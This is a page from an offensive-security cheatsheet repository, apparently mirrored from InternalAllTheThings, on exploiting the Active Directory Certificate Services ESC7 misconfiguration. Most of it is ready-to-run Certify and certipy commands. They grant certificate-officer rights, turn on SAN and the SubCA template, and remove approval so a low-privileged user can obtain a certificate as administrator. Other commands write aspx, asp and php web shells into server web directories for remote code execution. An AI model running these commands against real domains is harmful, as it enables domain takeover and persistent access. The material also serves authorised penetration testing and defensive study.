daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc07.md (3028B)


      1 ---
      2 title: "Active Directory - Certificate ESC7"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc07.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc07.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC7
     12 
     13 ## ESC7 - Vulnerable Certificate Authority Access Control
     14 
     15 **Exploitation**
     16 
     17 * Detect CAs that allow low privileged users the `ManageCA`  or `Manage Certificates` permissions
     18 
     19     ```ps1
     20     Certify.exe find /vulnerable
     21     # or
     22     certipy find -enabled -u user@domain.local -p password -dc-ip 10.10.10.10
     23 
     24     # add "Manage Certificates" privilege
     25     certipy ca -ca 'DOMAIN-CA' -username user@domain.local -p GoldCrown -add-officer user -dc-ip 10.10.10.10 -target-ip 10.10.10.11
     26     ```
     27 
     28 * Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)
     29 
     30     ```ps1
     31     Certify.exe setconfig /enablesan /restart
     32     ```
     33 
     34 * Request the certificate with the desired SAN.
     35 
     36     ```ps1
     37     Certify.exe request /template:User /altname:super.adm
     38     ```
     39 
     40 * Grant approval if required or disable the approval requirement
     41 
     42     ```ps1
     43     # Grant
     44     Certify.exe issue /id:[REQUEST ID]
     45     # Disable
     46     Certify.exe setconfig /removeapproval /restart
     47     ```
     48 
     49 **Exploitation 2**:
     50 
     51 Alternative exploitation from **ManageCA** to **RCE** on ADCS server:
     52 
     53 ```ps1
     54 # Get the current CDP list. Useful to find remote writable shares:
     55 Certify.exe writefile /ca:SERVER\ca-name /readonly
     56 
     57 # Write an aspx shell to a local web directory:
     58 Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
     59 
     60 # Write the default asp shell to a local web directory:
     61 Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
     62 
     63 # Write a php shell to a remote web directory:
     64 Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
     65 ```
     66 
     67 **Exploitation 3**:
     68 
     69 ```ps1
     70 # enable SubCA template
     71 certipy ca -ca 'DOMAIN-CA' -enable-template 'SubCA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11
     72 
     73 # request a certificate based on subCA template
     74 certipy req -ca 'DOMAIN-CA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 -template SubCA -upn administrator@domain.local
     75 
     76 # issue failed certificate request
     77 certipy ca -ca 'DOMAIN-CA' -issue-request 7 -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11
     78 
     79 # retrieve the issued certificate
     80 certipy req -ca 'DOMAIN-CA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 -retrieve 7
     81 ```
     82 
     83 ## References
     84 
     85 * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
     86 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)